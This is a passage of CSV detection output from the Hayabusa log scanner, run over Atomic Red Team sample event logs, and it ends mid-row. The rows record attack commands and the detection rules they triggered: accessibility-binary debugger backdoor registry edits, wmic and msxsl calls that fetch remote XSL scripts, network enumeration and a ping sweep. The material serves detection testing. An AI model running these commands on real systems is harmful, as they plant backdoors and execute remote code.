Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process /FORMAT:list : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view /domain : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.1 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.2 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.3 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.4 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.5 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.6 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.7 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.8 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.9 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.10 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.11 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.12 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.13 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.14 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.15 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.16 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.17 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 